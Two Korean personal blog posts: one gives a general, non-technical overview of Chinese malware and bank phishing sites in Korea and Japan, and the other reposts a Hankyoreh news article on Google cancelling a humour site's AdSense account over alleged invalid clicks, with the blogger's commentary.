Lavasoft사의 Ad-Aware를 쓰는데 꽤 괜찮다. 리소스를 쫌 잡아먹어서 그렇지 Kasperky IS보다야

더잡아먹진 않는다..;; 근데..문제는 중국이다.. 최근에 인터넷을 돌아다니다 보면 중국산 악성코드에

시달리는 분들이 많은데 중국산 악성코드는 우리나라에서..흔히 악성코드라 일컫는 '의사세균' 이나

시작페이지 고정 등은 어여삐 봐줄수 있는 수준인것 같다. 중국 악성코드들은 컴퓨터를 완전히

마비시키거나 제멋대로 프린터를 하거나 중요한 파일을 하나씩 삭제 시키거나 하는 작업을 수행

한다는데.. 중국 사이트 서핑을 하고 난 유저들이 많이들 걸렸다고 하고 삭제또한 상당히 힘들다고

한다.

사용자 삽입 이미지

아래화면은 7Code라는 중국의 스파이웨어 치료백신을 만드는 회사이다.. 죄다..중국어라 당연히

알아볼수가 없지만.. 어쨋건 다운로드 메뉴에 보면 뭔가 다운로드 받아서 쓸수있을듯 하다..;;

그림보고 대충 해보면 알것 같다. 중국악성코드에 감염되면 이같이 그나라에서 나오는 백신을

쓰는게 가장 나을듯 싶긴한데,. 사실 백신 만드는 회사들이 모든 나라의 악성코드를 캐치할수도

없는것이고.. 악성코드는 지금의 근본적인 인터넷 체계가 바뀌지 않는한 항상 위험존재로 남아

있을듯 싶다.

중국은 사실 이러한 인터넷 쪽으로의 발전이 늦게부터 시작된 나라이지만.. 워낙에 인구수도

많고 이중에서도 컴퓨터쪽에 관심이 있는 사람들도 많을것이고.. 프로그래밍을 잘하는 선수

중국인이여도 생계유지가 곤란해서 그걸위해 한국사이트에 많은 공격을 가한다고 한다..

트로이 목마 계열
- 금융권을 모니터링 하여 계좌번호등을 추출 시도
- 키보드 및 마우스 로깅

- 게임 사이트의 ID, PW 훔치기
- 포탈 사이트의 ID, PW 훔치기로 확대
• 피싱 계열
- 금융권을 가장
- 인터넷 신용거래를 가장
• 취약점등을 활용한 0-day 공격
- 일반 운영체제의 취약점 공격
- 일반 어플리케이션의 취약점 공격 (IE, Office…)
- 웹 어플리케이션의 취약점 공격 (Zero-Board…)
• 최근에는 바이러스와 특정 사이트의 ID, PW를 훔치는 트로이목마의 결합

위에 예를 든것은 중국 해커들이 우리나라 사이트에 대해 많이 행하는 공격이다.

꽤 됐는데 리니지 ID,PW를 해킹당해 자신도 모르는 사이에 팔려서 불법이지만 현금시가

1000만원이 넘게 털린 분도 있다하니..(필자는 리니지1이 처음 베타로 나왔을때 잠시 해본것외엔

해본게 없는데 무서운 게임이다...참..) 여기까진 그나마 애교로 봐줄수도 있을지 모르지만

금융권 해킹이 가장 무서운 일인것 같다. 이제는 인터넷 뱅킹이 많이 발달해서 컴퓨터를 잘 모르는

어르신들도 많이 이용하고 있다.. 자신도 모르게 해킹당했다면..물론 법적책임은 은행에 있긴 하겠

지만 무서운 일이 아닐수 없다..

이런 일은 굳이 중국악성코드..뿐이 아니다. 피싱사이트로도 상당한 피해를 보고들 있는데

우리나라 내에서의 피싱사이트를 예로 들자면.. 큰 은행인 국민은행의 피싱사이트를 예로

들수 있겠다.

사용자 삽입 이미지
국민은행 인터넷 뱅킹 주소는 http://ibn....으로 시작하는데 정상적인 경로대로 들어가면 메인

홈페이지에서 인증서를 거쳐서 들어가는것이 맞지만 북마크등을 통해 ibn으로 시작되는 도메인

으로 들어가면 저런 피싱사이트가 있었나 보다.. 접속하게되면 자동으로 악성코드가 설치되어

윈도우 내의 hosts 파일내부를 바꿔 브라우저 실행시 피싱사이트를 읽어들이게 되는데..

사실 왠만큼 컴퓨터를 다뤄본 사람들이라면 저화면을 보고 피식 할수도 있을것이다.

다른건 그렇다 치고.. 비밀번호를 줄여서 비번이라고 해놓은건..참 코믹하다. 아무튼.. 잘모르시는

분들은 속기쉬울수도 있는 부분이긴하다. 이는 중국이나 우리나라뿐이 아니다.. 일본의 경우

사용자 삽입 이미지

금융권 사이트인 kabu.com이다. 그러나 피싱사이트는 우리가 흔히 실수로 오타낼수 있는 부분인

wwwkabu.com 으로 되어있어서 언뜻보면 매우 헷갈린다. 실제로 www.kabu.com에 접속 해봤을

때 피싱사이트와 매우 흡사했다.

(2부에서 계속..)
신고
사용자 삽입 이미지
(원문발췌 : 한겨레신문, 구본권 기자)
“나쁜 짓 하지 말자(Don’t be Evil)”는 게 우리 기업의 철학이니, 무조건 구글을 믿어라?
세계 최대의 인터넷기업 구글과 한국의 한 유머사이트 간에 벌어진 ‘광고료’ 다툼으로,
구글의 새로운 면모가 알려지고 있다.

구글 “부정클릭 발견…광고비 못준다…이유는 못밝힌다”

웃긴대학 “부정클릭 소명해달라…그 이전까지 누적금액은 지급해달라”

유머사이트 ‘웃긴 대학’(www.humoruniv.com, 대표 이정민)은 세계 최대의 인터넷기업인 ‘구글’(www.google.co.kr)에 대해 “광고료를 주지 않았다”며 “곧 소송에 들어가겠다”고 밝혔다.

웃긴대학은 지난해 10월부터 3개월간 구글의 키워드 광고인 ‘구글 애드센스’(GoogleAdsense)를 사이트에 올리고 광고해왔으나 석달 만에 구글의 일방적인 계약 해지로 광고 수익을 한푼도 지급받지 못했다고 사이트를 통해 밝혔다. 웃긴대학쪽은 30일 안(2월19일)에 구글로부터 납득할 만한 회신을 받지 못할 경우 구글에 대해 소송을 내기로 했다.

구글의 광고상품 ‘애드센스’는 사이트 운영자들이 자신의 웹페이지에 구글의 광고를 게재하고
노출횟수와 클릭횟수에 따른 수익을 구글과 공유하는 구글의 광고기법이다.

구글쪽은 “자동 프로그램을 통한 부정클릭이 포착됐다”며 웃긴대학에 대해 일방적 계약 해지를 통보하고, 부정클릭의 사유를 알려달라는 웃긴대학쪽의 요구를 무시하고 있다. 또한 구글은 웃긴대학쪽에 언제 어떤 아이피의 컴퓨터를 통해 부정클릭이 얼마나의 규모로 일어났는지를 전혀 밝히지 않은 채 일방적으로 “부정클릭에 따른 계약해지”를 통보하고, 3개월 동안 누적된 적립금을 요구하는 웃긴대학쪽에 적립금도 지급할 수 없다고 밝혀 웃긴대학쪽이 반발하고 있다.

웃긴대학은 “구글에 두 달이 넘도록 수익금 지급을 독촉하고 수표 발행을 위해 PIN번호 비용까지 지불했는데도 묵묵부답으로 일관하더니, 이제 와서 부정클릭 때문에 돈을 줄 수 없다는 계약해지 통보만 이메일로 보내왔다”고 주장하며 구글 본사와 주고받은 이메일 내용을 공개했다.

특히 웃긴대학쪽은 “어떤 IP에서 얼마나 부정클릭이 발생했는지 확인하고자 한다”는 메일을 거듭 보냈지만, 구글쪽은 “우리는 그런 증거를 제시하지 않아도 되고 또 구글의 시스템은 독점기술이기 때문에 공개할 수 없다”는 반응을 받았을 뿐이라고 밝혔다.

구글 한국영업소 “죄송하다. 우리 소관이 아니라 할 말이 없다.”

웃긴대학은 광고 해지와 관련해 구글에 대응하는 과정에서 구글쪽이 보인 무책임하고 비밀스러운 태도에 대해 문제를 제기했다.
구글은 한국 광고주들을 상대로 영업활동을 하고 수금하는 한국영업사무소를 운영하고 있으나 이번에 문제가 되자 “우리 소관이 아니다. 미국 본사와 해결하라”는 무책임한 답변으로 일관하고 있다고 웃긴대학쪽은 밝혔다.
이는 이번 사안에 대한 구글쪽의 입장을 듣고자 한 <한겨레> 취재진도 경험한 바다. 구글 한국영업사무소쪽은 18일 구글의 공식 입장과 이 문제에 대한 책임있는 답변을 해줄 수 있는 국내외 구글 직원과의 연락을 요구하는 기자에 대해 “이 문제에 대해 아는 바가 없다”며 “죄송하다. 한국에 담당자와 책임자가 아무도 없다. 드릴 말이 없다”는 답변으로 일관했다. 또한 구글의 한국 홍보를 맡고 있는 홍보대행사와 논의하라고 해, 이를 맡은 광고에이전시쪽을 18일 취재했으나 광고에이전시쪽도 마찬가지로도 “우린 구글의 홍보를 담당하고 있을 뿐 알지 못하는 일이다. 광고 본사와 해결할 일”이라는 말을 할 따름이었다.

<한겨레>는 한국 사무소쪽에서 아무런 입장을 듣지 못해 구글 본사의 몇몇 계정으로 18일, 19일 잇따라 구글쪽의 설명을 듣고자 한다는 메일을 보냈으나, 19일 밤 현재 아무런 회신을 받지 못했다.

이에 대해 웃긴대학 이정민 사장은 “구글이 입장을 밝히지 않을 것으로 본다”며 “언론이 취재를 요청했을 때도 그러했으니, 우리가 구글로부터 어떤 대우를 받았겠느냐”고 말했다. 이 사장은 19일 “구글은 이번 사안을 심각하게 생각지 않고 있는 것 같다”며 “약간 소란하다 그치지 않겠느냐는 태도인 것 같다. 그래서 이 문제를 공개하기로 한 것이다”고 밝혔다.

웃긴대학 “시작 이틀간 추천유도 글올렸다. 석달간 문제없다가 2000만원 누적되자 ‘해지’”

이정민 웃긴대학 사장은 “애초에는 구글이 한국에 법인을 설립하는 날 구글을 상대로 민형사 소송을 제기하려고 했으나, 앞으로 30일 안에 구글로부터 납득할 만한 해명을 듣지 못할 경우 구글 본사를 상대로 소송을 제기하겠다”고 말했다.

웃긴대학쪽은 구글이 ‘부정클릭’의 사유를 밝히지 않는 것과 함께, 만약 부정클릭이 발생해 적발되었더라도 정상적으로 누적된 석달간의 광고료 2000만원을 지급하지 않는 것은 문제라고 지적하고 있다. 애드센스를 단 사이트 운영자는 계정을 통해서 실시간으로 누적된 적립금을 확인할 수 있다. 웃긴대학은 자사의 사이트에 하루 평균 20만명이 방문한다고 밝혔다.

웃긴대학쪽은 “처음 구글광고를 적용할 때 사업을 알리는 차원에서 2일 정도 추천유도성 글을 올렸지만 회원의 지적으로 바로 자발적으로 내렸다. 이를 두고 구글이 (부정클릭의) 증거라고 한다면 이후 2달은 웃긴대학을 이용한 셈”이라며 “(애드센스) 시작 3일 만에 추천 유도로 해지되었다면 구글의 정책을 존중했을 것”이라고 밝혔다.

누리꾼, “나도 아무 해명 받지 못한 채 일방적으로 해지당했다” 고발 잇따라

웃긴대학이 구글의 애드센스 광고료를 지급받지 못했다는 공지를 올리자, 이에 대해
‘유사한 사례’를 보고하는 사람들도 잇따르고 있다.

5년째 인터넷 서버 임대사업을 해오고 있는 권오득(22)씨는 19일 “비슷한 경험을 했다”며 “애드센스를 운영해 지난해 7월 구글로부터 80만원을 지급받았으나 다음달 200만원에 적립금이 누적되었으나 구글로부터 부정클릭을 이유로 일방해지를 당했다”고 밝혔다. 권씨는 “한국과 미국에 거듭 이메일을 보냈으나 답변은 똑 같다 아이피 동일 검출하나 내용은 밝힐 수 없다는 말 뿐이다”고 말했다. 해외 프로축구를 주제로 한 사이트를 운영중인 김창희(20)씨도 지난해 10월 구글 애드센스를 자신의 사이트에 달았다가 마찬가지 경험을 했다.

김씨는 “내가 구글로부터 받은 메일도 웃긴대학과 문구까지 꼭 같았다”고 밝혔다.

인터넷에는 웃긴대학처럼 애드센스 광고 계약을 일방해지당했다는 누리꾼들의 글과 함께 애드센스를 자신의 블로그와 사이트에 달아 다달이 구글로부터 송금을 받고 있다는 글이 섞여 있다.(관련링크 http://blog.my.lv/blog/index.php?blog_code=comfuture&article_id=6)

■애드센스란?

구글 애드센스 약관 https://www.google.com/adsense/localized-terms?hl=ko

구글의 애드센스는 애드워즈와 함께 구글의 막대한 수익원이다. 구글 애즈가 검색결과에 광고를 매칭시키는 광고주를 위한 키워드 광고라면, 애드워즈는 중소규모의 사이트 운영자까지 자신의 사이트에 컨텐츠와 관련 주제에 따라 매칭된 구글의 광고를 유치하게 한 뒤 이 광고수익을 구글과 사이트 운영자가 나누는 수익모델이다. 구글 애드센스의 매출은 꾸준히 성장해 2005년 현재 구글 전체 매출의 15%를 차지했다.

‘부정클릭’은 클릭 횟수에 따라 광고료가 가중되는 종량제 특성을 이용해 사람이나 로봇 등을 동원해 특정 아이피에서 클릭을 인위적으로 조작하는 행위로, 광고주에게 피해를 주는 행위라고 구글은 약관에 규정하고 있다. 구글은 부정클릭 감시 시스템을 통해 애드센스를 모니터하며, 부정클릭이 발견될 경우 일방적으로 계약 해지당하고 부정클릭 발생 이전의 적립금도 지급받지 못한다고 약관에 규정하고 있다.

구글이 규정하는 부정클릭의 기준은 △게시자가 자신의 웹 페이지에 발생시킨 클릭 △게시자가 자신의 광고에 대한 클릭을 조장 △자동 클릭 프로그램 또는 현혹성 소프트웨어 △게시자가 광고 코드를 변형시키거나 게재형식을 바꾸는 행위 등이다.

‘부정클릭’ 잣대 외국 거대사이트에도 동일하게 적용되나?

구글이 ‘부정클릭이 발생했다’며 구체적 사유를 밝히지 않은 채 일방적 애드센스 계약 파기를 통보하는 데 대해, 애드센스를 자신의 사이트에 달았던 누리꾼들은 대부분 “납득할 수 없다”는 반응이다.

아무리 구글이 철저한 모니터링을 통해서 ‘부정클릭’을 적발하고, 약관상 부정클릭 적발시 기존에 미지급된 적립금까지 무효화한다는 것이 약관상에 있다고 하더라도 이는 구글의 오만한 태도이고, 현실적으로도 계약파기를 납득할 수 없다는 게 누리꾼의 주장이다.

사이트 운영자가 알지 못하는 방법으로 특정 아이피와 시간대에 부정클릭이 발생할 수 있으나 이에 대한 구체적 소명 없이 “구글의 부정클릭 모니터가 적발했으니 계약을 일방적으로 해지한다”는 애드센스의 시스템에 대해 누리꾼은 문제를 제기한다.

웃긴대학 회원 ‘하늘보다투명한너’는 구글이 웃긴대학에서 발생했다고 하는 ‘부정클릭’의 예를 구글 광고가 돌고 있는 해외 대형 사이트에 적용할 경우, 한국과 동일한 처리를 할 것인지에 대해 의문을 품었다. 이 회원은 구글이 애드센스의 모범사례로 사이트에적시한 ‘백패커닷컴
(
http://www.backpacker.com/)’ 등에서 그 사이트에 유치된 구글 광고를 무차별적으로 클릭할 경우, 구글이 그런 대형 사이트에도 이유없이 ‘일방적 계약 해지’를 통보할 것인지 의문을 제기했다.

구글이 누구에 의해 어디에서 언제 ‘부정클릭’이 발생했는지를 밝히지 않은 채 일방적으로 계약을 해지할 경우, 애드센스를 운영자쪽에 대해 나쁜 의도를 품은 익명의 인터넷 이용자가 얼마든지 해당 사이트의 애드센스 수익을 ‘제로’로 만들어 골탕을 먹일 수 있기 때문이다.

구글은 자신들의 검색과 애드워즈, 에드센스의 알고리즘은 독창적 기술이자, 이 것이 알려질 경우 이에 따른 검색 결과 조작이 발생할 수 있다며 일체 공개를 않고 있다. 구글이 부정클릭의 구체적 내용을 공개하지 않는다는 주장도 이 논리의 연장선상에 있다.

그러나 구글 애드센스에 대해 문제를 제기하는 이용자들은 구글의 “독창적 기술내용”을 공개하라는 것이 아니다. 자신도 모르는 사이에 부정클릭이 발생했을 수 있으니, 그에 대한 최소한의 정보와 근거를 요구하는 것이다.

“나쁜 짓 하지 말자(Don’t be Evil)” 구글 모토의 본색은?

또한 이 문제에 대해 약관을 근거로, 구글이 이용자에게 “독점기술이므로 Google은 Google 모니터 기술의 작동 방식이나 귀하의 계정에서 발견한 구체적인 내용에 관하여 자세한 사항을 공개할 수는 없습니다”라는 일방적 통보를 하고 언론에조차 구체적 설명을 거부하는것은 전혀 구글답지 않다.

구글은 광고비와 마케팅비를 거의 사용해오지 않고, 사용자들을 구글 마니아로 만들어 이들의 ‘입소문’에 의존하는 홍보전략을 써왔다. 이러한 구전마케팅에 힘입고 구글 검색의 우수성과 기업문화의 독특함을 알려온 언론의 보도 덕택에 구글은 광고비를 쓰지 않고도 최고의 이미지를 구축하게 되었다. 이는 구글이 제공하는 서비스의 우수성과 함께 어우러져, 단기간에 구글이 세계 최고의 인터넷 기업이 되는 데 주요한 기능을 했다.

그러한 구글의 기업문화는 “나쁜 짓 하지 말자(Don’t be Evil)”는 구글의 모토로 요약된다. 그러나 세계적 인터넷 기업 구글이 한국의 한 유머사이트와 언론에 대해 보인 태도와 구글의 “나쁜 짓 하지 말자”는 모토는 어울리지 않는다.

더욱이 돈을 퍼붓는 광고와 마케팅보다 이용자들의 ‘입소문’이 훨씬 중요하다는 홍보전략을 갖고 있는 구글이, ‘입소문’의 효과를 무시하는 일은 이해하기 어렵다. 이번 사안은 그동안 이용자 우선의 충실한 서비스로 탁월한 기업으로 성장해온 ‘구글 본색’을 드러내주는 하나의 지표가 될 수 있다.

<한겨레> 온라인뉴스부 구본권 기자 starry9@hani.co.kr

◇ ‘웃긴대학’이 사이트에 올린 공지문.

웃긴대학의 운영진은 10월 12일부터 수익모델의 하나로 “Google Adsense”에 가입하여 키워드 광고를 실시했었습니다.

웃긴대학 글이나 자료 하단에 구글광고라고 하여 키워드들이 보여지고 회원이 클릭하면 해당 사이트로 이동하면서 클릭당 구글로부터 광고비를 받는 형식의 사업이었습니다.

많은 웃대생 분들이 해당 광고를 클릭해 주셔서 나름대로 괜찮은 금액이 적립되었습니다.

하지만 “부정클릭이 발견되었다”는 간단한 이메일과 함께 일방적 계약해지를 당하고 지금까지 적립된 금액 모두를 지급할 수 없다는 이해할 수 없는 구글의 결정으로 한 푼도 지급을 못 받게 되었습니다.

3주 만에 온다는 결제확인우편(PIN번호를 보내고 입력하면 그때부터 입금을 시키는 확인 체제)은 일방적인 계약해지가 있은 지 3일 후에 왔고(3달 만에 온 우편) 그래서 그 동안의 적립금을 한 푼도 못 받은 상태에서 계약해지를 당했습니다.

사과문을 올리는 것은 구글광고를 진행하는 동안 필요에 의해서 눌러주신 분들도 있지만 웃긴대학 운영에 보탬이 되라고 눌러주신 분들도 상당수 있었으리라는 생각에서 입니다.

웃긴대학은 “부정클릭”이라는 것을 절대 한 일이 없고 증거를 보내달라, 확인작업을 하자는 몇 번의 메일을 보냈지만 구글로부터 구글은 증거를 제시하지 않을 권리가 있고 일방적으로 한 푼도 안 줘도 되는 권리를 가지고 있다는 무시에 가까운 짤막한 메일을 받을 뿐이었습니다.힘없고 능력이 없어서 웃대생 분들의 귀찮음에도 불구하고 클릭해주신 노고와 지원을 헛되이 한 것 같아서 고개 숙여 웃대생 여러분들께 사과를 드립니다. 거만하고 부당한 영업행위를 하고 있는 구글에 대해서는 소송을 준비 중이고 구글이 한국에 정식으로 법인을 설립하는 날 민·형사상 소송을 걸 예정입니다.

다시는 우리나라의 사이트에 이와 같은 비상식적인 행위를 못하도록, 그리고 웃대가 아무리 힘이 없지만 구글이 합리적이고 이해가는 처사를 할 때까지 웃대생들과 웃대의 권리를 찾기 위해 최선을 다할 것을 약속드립니다.

◇ 구글이 웃긴대학에 보낸 계약해지 통보 메일

안녕하세요,귀하께서는 계정에서 발견된 무효 클릭에 관하여 자세한 내용을 확인하고 싶어하신다는 점을 잘 알고 있습니다.

하지만 Google 알고리즘은 독점 기술이므로 Google은 Google 모니터 기술의 작동 방식이나 귀하의 계정에서 발견한 구체적인 내용에 관하여 자세한 사항을 공개할 수는 없습니다.

아시는 바와 같이 Google은 무효 클릭 행위를 매우 중대하게 여기며 이를 엄격하게 다룹니다. 이 문제에 관한 Google의 정책에 따라 Google은 귀하의 계정을 중지시킴으로써 광고주를 보호하고 향후 귀하의 사이트에서 무효 클릭이 발생하지 않도록 조치를 취했다고 생각합니다.무효 클릭 행위로 인해 중지된 게시자는 더 이상 지불을 받지 못합니다. 귀하의 계정에 대한 수입은 영향을 받은 광고주에게 반환됩니다.마지막으로 이전에 말씀드린 바와 같이 저희는 귀하의 계정을 충분히 재검토 했으며 저희 결정을 번복하지 않을 것입니다.

감사합니다. Google AdSense 팀

구글과 웃긴대학이 주고받은 이메일 링크http://www.ringblog.net/tt/index.php?pl=241

---------------------------------------------------

위의 내용까지가 웃대와 구글사이에 있던 일을 퍼온 원문이다.. 이기사가 최근기사인지

쫌 지난 기사인지 잘 모르지만 최근에 Metal mania를 테터툴즈 블로그로 바꾸고 나선

google 애드센스에 나또한 관심이 있었고 바로 인증절차까지 거쳤다. 물론.. 웃대뿐의 문제는
 
아니라 생각한다.

글에 나왔듯이 악의를 품은 어떤 다른 사용자에 의해 부정클릭처럼 구글에 잡혀 계약해지를

당할수도 있는것이지만 자체 알고리즘이라 무조건 공개 할수없다는건.. 말이 안된다.

돈못받은 사람이 원하는건 돈을 왜 못받았나일 뿐이지 '애드센스팀에서 어떤 경로로

부정클릭을 잡아내는것인가' 가 아닐것이기때문에..

사실 어떤 블로그던 중소규모 사이트던 간에 이용자가 많다보면 그곳을 좋아하는 유저도

싫어하는 유저도 있기마련인데.. 꼭 그래서 부정클릭이 발생한다고 할 수는 없지만 충분히

가능성 있는일이 아닌가? 근데 한편으로 구글입장에서 보면 그런 경로를 밝힐 수 없는것도

당연할지는 모른다.. 잘못알려져서 일종의 조작이 애드센스 유저들 사이에서 활성화 된다면

구글의 수익에 많은 손실이 올테니까.. 거기까진 이해가 가는데. 지금 이 건을 보면.. 그냥

재수없으면 계약해지 받고 어찌됐던 구글은 자기네들 광고는 하고 인데.. 사용자만 엿먹는것
 
같아 기분이 안좋다. 어짜피 내블로그처럼 게스트가 몇 없는 소규모 사이트에서는 그러한

실제 수익을 보긴 힘들겠지만..ㅋㅋㅋ

개인적으론.. 이기적이 되자면.. 만일 이 블로그가 유명해진다면 구글 애드센스를 이용할지도

모르겠다. 어찌됐던.. 돈이 들어올테고.. 해지 당한다면 기분은 더럽겠지만 그전에 챙긴돈이

있다면 그걸로 만족하면 끝이니까..암튼.. 지금 당장은 이런글도 보고..귀찮기도 하고 해서

구글 애드센스를 써볼 생각따윈 없다!
신고